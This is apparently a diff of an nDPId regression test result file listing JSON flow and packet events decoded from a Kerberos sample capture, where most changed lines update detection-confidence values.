00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1549337937701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937701,"pkt":"AAgCHEeupB9ywglqCABFAAD6E6JAAIAGfWqsEAgIrBAIyQGFwBxI3pNwglNt+lAYAQCvQgAAMIQAAADMAgEKYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG2EupGhqTVA+Kxm5vIdkbfFjlPoe8DmjpF\/p2I3j7EwFjqQzavz5jy+cGzZKn09a9y0dyj\/mpeHcqpjjORB3KYfxKGHrDmiKKSYiCwqx86ee7rLKiQPX2z3RSwNa4fWz8uAjgw+I5CkXYbP6rNu"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00776{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337937703,"pkt":"pB9ywglqAAgCHEeuCABFAAEXANlAAIAGkBasEAjJrBAICMAdAFjHhcaiuhdcXlAYAQCv5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBFIcW1KoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} -00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337937703,"pkt":"AAgCHEeupB9ywglqCABFAAE+E6VAAIAGfSOsEAgIrBAIyQBYwB26F1xex4XHkVAYAQDp0AAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg1NlqlBQIDBJWNpgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} -00731{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337937724,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAN1AAIAGj8KsEAjJrBAICMAeAFgo\/29go\/Vk0VAYAQAVQgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4EwWkoanvLUiVA5eu8uG72\/EPy4+eHAiK9HbftleuqZ7DwBR\/wY3Sc5USTXPr6SJXdlLH8zfIE5MwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLSk9ITlNPTi1QQySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEUhxbUqgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337937724,"pkt":"AAgCHEeupB9ywglqCABFAACYE6pAAIAGfcSsEAgIrBAIyQBYwB6j9WqFKP9wn1AYAQCbeQAAeBxjGZR555TmhlGtfWdB3hqYo6lYswe6vKpNUcrN1M7KGcxMIdPLYhZ04dECjGI6ypolTWuvt884Bi2lq0pIFbZFVKD3x\/BnUesSWAB9L0qg+5NPzwAEggckaZSGKHdd5sXD0ux4MNvoyw986qY1Nw=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937725,"flow_last_seen":1549337937725,"flow_idle_time":7580000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":1,"thread_ts_msec":1549337937725,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1549337937725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1549337937725,"pkt":"pB9ywglqAAgCHEeuCABFAAB4AONAAIAGkKusEAjJrBAICMAfAFi1TK\/3YmHJT1AYAQDj2wAAbj2wbk+derrxO0c0pxRSdruhR6\/j4Ui\/xNsBa8OfbfRkbAwdywbQynHUORFcFH8maukxsoLa+OhvD2a5+zDPKPlneJ\/sg2b\/GuIvr5ZD3Bg="} @@ -97,12 +94,11 @@ 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1549337940433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337940433,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAP9AAIAGkAOsEAjJrBAICMAhwAMZWx3nQJkKeFAYAP\/gGgAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBELB6nut18jCMG03H8TJyLvCf8wWF6F7BqJ4bg85nSMTOiCmzGy+a5tNrq0VYdAt2TCIZ2p1Ys\/DpnWvcPxOp0LCSoajHgQcBAQE\/\/\/\/\/\/8AAAAAVL504MDCo+3fnXZuQhY33A=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1549337951630,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1549337951630,"pkt":"pB9ywglqAAgCHEeuCABFAAETAQ1AAIAGj+asEAjJrBAICMAjAFj9jJo6lSyMo1AYAQB4vAAAAAAA52qB5DCB4aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBvTCBuqAHAwUAQIEAEKEcMBqgAwIBAaETMBEbD3RoZXJlc2Euam9obnNvbqIMGwpIQVBQWUNSQUZUox8wHaADAgECoRYwFBsGa3JidGd0GwpIQVBQWUNSQUZUpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEXdv8Z6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} +00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1549337951631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1549337951631,"pkt":"AAgCHEeupB9ywglqCABFAAEYE9dAAIAGfResEAgIrBAIyQBYwCOVLIyj\/YybJVAYAQAREAAAAAAA7H6B6TCB5qADAgEFoQMCAR6kERgPMjAxOTAyMDUwMzM5MTBapQUCAwNKZqYDAgEZqQwbCkhBUFBZQ1JBRlSqHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSsgYsEgYgwgYUwYqEDAgETolsEWTBXMCagAwIBEqEfGx1IQVBQWUNSQUZULk9SR3RoZXJlc2Euam9obnNvbjAFoAMCARcwJqADAgEDoR8bHUhBUFBZQ1JBRlQuT1JHdGhlcmVzYS5qb2huc29uMAmhAwIBAqICBAAwCaEDAgEQogIEADAJoQMCAQ+iAgQA"} -00732{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337951631,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1549337951638,"pkt":"pB9ywglqAAgCHEeuCABFAAFjARFAAIAGj5KsEAjJrBAICMAkAFi0GLZOsNNMHlAYAQAvMAAAAAABN2qCATMwggEvoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4Wndh9xw8qUUtso0vc8TuP9R5peLYlUKrIi93QkMXsrfVII\/B8UhLSOwTSHwq5LSHP2vURJP\/YpgwEaEEAgIAgKIJBAcwBaADAQH\/pIG9MIG6oAcDBQBAgQAQoRwwGqADAgEBoRMwERsPdGhlcmVzYS5qb2huc29uogwbCkhBUFBZQ1JBRlSjHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSlERgPMjAzNzA5MTMwMjQ4MDVaphEYDzIwMzcwOTEzMDI0ODA1WqcGAgRd2\/xnqBUwEwIBEgIBEQIBFwIBGAIC\/3kCAQOpHTAbMBmgAwIBFKESBBBKT0hOU09OLVBDICAgICAg"} -00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} +00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1549337951638,"pkt":"AAgCHEeupB9ywglqCABFAADKE9xAAIAGfWCsEAgIrBAIyQBYwCSw01HStBi3iVAYAQA+gAAAtgxIRqdE2xpJueUsyACfoBkRIO2d0vdWoZTH7\/Uq\/IekfUoxUBvBS550+iWChkmhJucRdY1OlQL1WMQC8uhxGdFWaESvp\/JzESFsbwdEK2JaAYNNrn2MyR4+4w4oYIB6xP3aoFYA9y5s01X0oEa\/3ePvjWb66V7pwZZYO9bc89yozmxDtVb4zCT8SyPCYGj7ljiOz9w+sICchbsKK+VkdLL4"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337951639,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1549337951639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1549337951639,"pkt":"pB9ywglqAAgCHEeuCABFAABRARdAAIAGkJ6sEAjJrBAICMAlAFiRlp2kV2CH+1AYAQDPTQAAMzcwOTEzMDI0ODA1WqcGAgRd2\/xvqBIwEAIBEgIBEQIBFwIBGAIC\/3k="} @@ -132,32 +128,32 @@ 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929811,"flow_last_seen":1549337929812,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 